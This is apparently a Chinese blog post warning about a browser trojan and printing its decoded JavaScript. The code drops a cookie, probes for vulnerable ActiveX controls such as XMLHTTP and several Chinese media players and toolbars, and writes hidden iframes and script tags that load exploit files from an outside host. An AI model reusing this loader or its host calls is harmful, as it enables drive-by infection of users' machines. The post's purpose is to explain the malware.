一个可恶的javascript病毒/木马解码之后的代码
中毒的话,整个网络都会受影响,表现为所有的IE浏览器打开的网页都会在前面加一个 javascript 的连接。清除比较麻烦。显示的这段是这个链接后面的代码:
var vDA1 = new window[ " Date " ]() vDA1[ " setTime " ](vDA1[ " getTime " ]() + 24 * 60 * 60 * 1000 ) var eOTo$ 2 = new window[ " String " ](window[ " document " ][ " cookie " ]) var eZT3 = " Cookie1= " var VMliYvVKu4 = eOTo$ 2 [ " indexOf " ](eZT3) if (VMliYvVKu4 == - 1 )
... {
window["document"]["cookie"]="Cookie1=POPWINDOS;expires="+vDA1["toGMTString"]()
try...{if(newActiveXObject("Microsoft.XMLHTTP"))window["document"]["write"]('<script src="http://NoP.gs/s368/NewJs1.js"></script>');}catch(e)...{}//ms06014try...{if(newActiveXObject("DPClient.Vod"))window["document"]["write"]('<iframe style=display:none src="http://NoP.gs/s368/t368ok.gif"></iframe>');}catch(e)...{}//XLtry...{if(newActiveXObject("MPS.StormPlayer.1"))window["document"]["write"]('<iframe style=display:none src="http://NoP.gs/s368/Go368.gif"></iframe>');}catch(e)...{}//BFtry...{if(newActiveXObject("POWERPLAYER.PowerPlayerCtrl.1"))window["document"]["write"]('<iframe style=display:none src="http://NoP.gs/s368/T368.gif"></iframe>');}catch(e)...{}//PPStry...{if(newActiveXObject("Pdg2"))window["document"]["write"]('<iframe style=display:none src="http://NoP.gs/s368/reader368.gif"></iframe>');}catch(e)...{}//CXtry...{if(newActiveXObject("GLCHAT.GLChatCtrl.1"))window["document"]["write"]('<iframe style=display:none src="http://NoP.gs/s368/Link368.gif"></iframe>');}catch(e)...{}//LZtry...{if(newActiveXObject("BaiduBar.Tool.1"))window["document"]["write"]('<iframe style=display:none src="http://NoP.gs/s368/Pic368.gif"></iframe>');}catch(e)...{}//Baidu
}
可见,这是针对地影响的。
一个可恶的javascript病毒/木马解码之后的代码相关推荐
- 分享一个开源的JavaScript统计图表库,40行代码实现专业统计图表
这可能是史上最简单易用的开源统计图表绘制库了.柱状图,饼状图,点状图等等您能想到的类型全部支持. 这个开源库的官网:http://www.chartjs.org/ 直接看如何只用40行代码就实现专业的 ...
- 病毒木马查杀实战第013篇:一个基于.NET的“敲竹杠”病毒研究
前言 恶意程序发展至今,其功能已经从最初的单纯破坏,不断发展为隐私的窥探,信息的盗取,乃至如今非常流行的"敲竹杠"病毒,用于勒索.可见随着时代的发展,病毒的作者们往往也是想利用自己 ...
- 病毒木马入侵招数专题
病毒木马入侵招数专题 作者:admin 日期:2005-05-10 11:21:21 字体大小: 小 中 大 网络时代可不太平,谁没有遭遇过病毒或木马?从CIH.I Love You到红色代码.Nim ...
- 病毒木马入侵招数大曝光
网络时代可不太平,谁没有遭遇过病毒或木马?从CIH.I Love You到红色代码.Nimda,从BO到冰河,无一不是网友经常懈逅的对象.怎么避免这些"艳遇"是广大用户孜孜以求的目 ...
- 病毒木马防御与分析实战
<病毒木马防御与分析>系列以真实的病毒木马(或恶意程序)为研究对象,通过现有的技术手段对其分析,总结出它的恶意行为,进而制定出相应的应对方法,对其彻底查杀.当然,因为我个人水平的有限,查杀 ...
- 如何杀掉可恶的Notkelvir病毒
如何杀掉可恶的Notkelvir病毒 --代腾飞 2006-5-10 于成都 这几天我的机子无缘无故地中了可恶的Notkelvir病毒,每次系统启动就占用了100%CPU,使机子运行 ...
- Atitit.病毒木马程序的感染 传播扩散 原理
Atitit.病毒木马程序的感染 传播扩散 原理 1. 从木马的发展史考虑,木马可以分为四代 1 2. 木马有两大类,远程控制 vs 自我复制传播1 3. 自我复制2 3.1. 需要知道当前cpu ...
- 可疑文件_鉴定文件是不是病毒木马的可靠方法 | 免费快速精准
我们经常将计算机病毒和木马放在一起说,这两者是我们无论使用电脑还是手机都最不想碰到的东西. 它们其实是有区别的,病毒得名于它会像自然界的病毒一样破坏系统的功能,而木马的称呼则来源于公元前十二世纪希腊和 ...
- 记录某大门户网站自动跳转不良网站,团队通宵排查病毒木马全过程
某周五晚上,自己正舒服地躺在沙发上,手里的王者荣耀,米莱迪正在快乐地偷塔呢,突然一个电话打进来,一看是老板,心里一阵不祥的预感:看来这场游戏是不能善终了,兄弟们对不住了. 果不其然,事情是某机构运行了 ...
最新文章
- redmine mysql配置_Redmine安装指南一:railsinstaller+apache+mysql(推荐)
- KMP的next[]数组
- java 基础(匿名内部类)
- OPatch cannot find a valid oraInst.loc file to locate Central Inventory
- 性能测试报告模板_性能测试规范之测试报告
- 关于com.android.support:appcompat-v7:26.0.0以上无法下载的问题
- python查看文档的软件_Python __doc__属性:查看文档
- vue中使用codemirror
- 兰州交通大学C语言课程设计,兰州交通大学C语言课程设计报告(完整版).doc
- matlab2013b下载安装包以及安装教程
- 计算机基础知识和运用2作图,2020年9月统考《计算机应用基础》基础知识试题及答案2...
- 揭秘 | Akuna工作体验大揭秘
- 督查督办系统在企业能发挥哪些作用?
- 2021年美国对中国货物出口情况:美对中的出口额达到1492亿美元,同比增长21.30% [图]
- Excel收纳箱:如何通过VBA获A列数据的最大行数
- Android最完整的仿QQ表情聊天图文展示代码示例
- 眼光毒辣!这家投资团队让 “鸡蛋森” 马克安德森投了都说好
- py.切片(slice)
- 企业4A架构--TOGAF
- [nn.Parameter]理解总结与初始化方法大全